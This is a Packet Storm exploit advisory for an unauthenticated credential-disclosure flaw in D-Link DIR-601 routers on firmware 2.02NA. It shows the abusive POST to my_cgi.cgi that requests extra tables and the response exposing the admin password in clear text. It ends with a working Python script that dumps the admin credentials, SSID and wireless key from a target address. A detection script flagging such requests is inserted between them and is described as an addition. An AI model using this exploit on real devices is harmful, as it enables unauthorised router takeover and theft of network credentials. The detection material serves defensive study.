ID PACKETSTORM:148463 Type packetstorm Reporter Richard Rogerson Modified 2018-07-10T00:00:00
Description
# Exploit title: D-Link DIR601 2.02NA - Credential disclosure
# Date: 2018-07-10
# Exploit Author: Richard Rogerson
# Vendor Homepage: http://ca.dlink.com/
# Software Link: http://support.dlink.ca/ProductInfo.aspx?m=DIR-601
# Version: <= 2.02NA
# Tested on: D-Link DIR601 Firmware 2.02NA
# Contact: http://twitter.com/pktlabs
# Website: https://www.packetlabs.net
# CVE: N/A
# Category: Webapps, Remote
# 1. Description:
# While analyzing the Captcha function implemented in the DIR-601 (2.02NA firmware),
# an HTTP request was found to be responsible for the handoff to client-side code.
# Inspecting the HTTP requests, it was identified that a parameter named "table_name"
# is used to instruct the back-end application which content to return. By abusing this
# request, it was found possible to retrieve sensitive information relating to the device
# configuration and administrative credentials.
# It is possible to modify the HTTP POST to my_cgi.cgi and include additional table_name
# references to retrieve the administrative credentials, wireless SSID, and pre-shared key
# where applicable. Enumerating the naming conventions within the client-side code, it was
# determined that a number of potentially sensitive parameters/tables exist in the
# back-end environment which provide significant value if retrieved; four of these are:
# - Admin_user
# - Wireless_settings
# - Wireless_security
# - Wireless_wpa_settings
Sample of the vulnerable POST request:
HTTP Request
POST /my_cgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.1/login_real.htm
Content-Length: 86
Connection: close
Pragma: no-cache
Cache-Control: no-cache
request=no_auth&request=load_settings&table_name=create_auth_pic&table_name=admin_user <- additional table requested
Sample response:
HTTP Response
HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 01 Jan 2011 00:57:12 GMT
Server: lighttpd/1.4.28
Content-Length: 228
<?xml version="1.0"?><root><login_level>1</login_level><show_authid>50649</show_authid><admin_user><admin_user_name>admin</admin_user_name><admin_user_pwd>clear-text-password</admin_user_pwd><admin_level>1</admin_level></admin_user></root>
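The request above is recognisable on the wire: it repeats table_name and asks, before any authentication, for tables the login page never needs. The following detection script is an added example and is not part of the advisory; it assumes a simple constructed record format of "client method path body", uses the table names listed in this advisory, and flags any request=no_auth call to my_cgi.cgi that requests anything beyond create_auth_pic.

```python
# Added example (not the advisory's code): flag unauthenticated my_cgi.cgi
# load_settings requests that ask for more than the captcha table.
from urllib.parse import parse_qs

# The only table the login page needs before authentication.
ALLOWED_NO_AUTH = {"create_auth_pic"}
# Tables the advisory identifies as holding credentials or wireless secrets.
SENSITIVE = {"admin_user", "user_user", "wireless_settings",
             "wireless_security", "wireless_wpa_settings"}

def inspect_body(path, body):
    """Return (severity, extra_tables); severity is ok/suspicious/critical.

    parse_qs keeps repeated keys as lists, which matters here: the abuse
    relies on repeating request= and table_name= in one body.
    """
    if path != "/my_cgi.cgi":
        return "ok", []
    params = parse_qs(body, keep_blank_values=True)
    if "no_auth" not in params.get("request", []):
        return "ok", []           # authenticated sessions are out of scope
    tables = [t.lower() for t in params.get("table_name", [])]
    extra = sorted(t for t in tables if t not in ALLOWED_NO_AUTH)
    if not extra:
        return "ok", []
    if any(t in SENSITIVE for t in extra):
        return "critical", extra  # credentials / PSK requested without auth
    return "suspicious", extra    # unexpected table; worth a look

# Constructed sample records: "client method path body" (body is "-" for GET).
# "example_table" is a hypothetical name, not a known DIR-601 table.
SAMPLE_LOG = [
    "192.168.0.50 POST /my_cgi.cgi request=no_auth&request=load_settings&table_name=create_auth_pic",
    "192.168.0.50 POST /my_cgi.cgi request=no_auth&request=load_settings&table_name=create_auth_pic&table_name=admin_user",
    "192.168.0.77 POST /my_cgi.cgi request=no_auth&request=load_settings&table_name=create_auth_pic&table_name=example_table",
    "192.168.0.77 GET /login_real.htm -",
]

def scan(lines):
    """Return [(client, severity, extra_tables)] for every flagged record."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) != 4 or parts[1] != "POST":
            continue
        client, _method, path, body = parts
        severity, extra = inspect_body(path, body)
        if severity != "ok":
            hits.append((client, severity, extra))
    return hits
```

Running scan(SAMPLE_LOG) reports the second record as critical (admin_user requested without auth) and the third as suspicious; the legitimate captcha request and the GET are ignored.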
# 2. Exploit Code:
#!/usr/bin/python
# Python 2 script (print statements, urllib2); indentation restored.
import socket,sys,urllib,urllib2
import xml.etree.ElementTree as ET

print """Packetlabs
====================================
D-Link DIR-601 Authorization Bypass
"""
if len(sys.argv) != 2:
    print "usage:",sys.argv[0],"<ipaddr>"
    sys.exit()
else:
    ipaddr=sys.argv[1]
    print "Retrieving admin username, password and wireless security configuration from",ipaddr

# build URL
url = 'http://'
url+= ipaddr
url+='/my_cgi.cgi'
data = "request=no_auth&request=load_settings&table_name=admin_user&table_name=user_user&table_name=wireless_settings&table_name=wireless_security&table_name=wireless_wpa_settings"

# send payload
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print "Sending payload to:",response.geturl()
retr = response.read()
root = ET.fromstring(retr)

# credential dump (child elements appear in the order the tables were requested)
print "\r\nAdmin Creds"
print "username:",root[0][0].text
print "password:",root[0][1].text

# dump wireless settings
print "\r\nWireless Settings"
sectype=int(root[3][0].text)
ssid=root[2][2].text
enctype="none"

print "SSID is:", ssid
if sectype == 2:
    enctype="WPA2"
    key=root[4][3].text
elif sectype == 1:
    enctype="WEP("
    keylength=int(root[3][3].text)
    if keylength == 5:
        enctype+="64bit)"
        key=root[3][5].text
    elif keylength == 13:
        enctype+="128bit)"
        key=root[3][9].text
    else:
        key="Error, please inspect xml manually above, keylength=%d" % keylength
        print retr
elif sectype == 0:
    print "Wireless network is open?"
    sys.exit()
else:
    # unrecognised security type; dump the raw XML for manual inspection
    key="unknown, sectype=%d" % sectype
    print retr

print enctype,"key is:",key
Source: https://packetstormsecurity.com/files/148463/D-Link-DIR601-2.02-Credential-Disclosure.html (original text: https://packetstormsecurity.com/files/download/148463/dlinkdir601202-disclose.txt)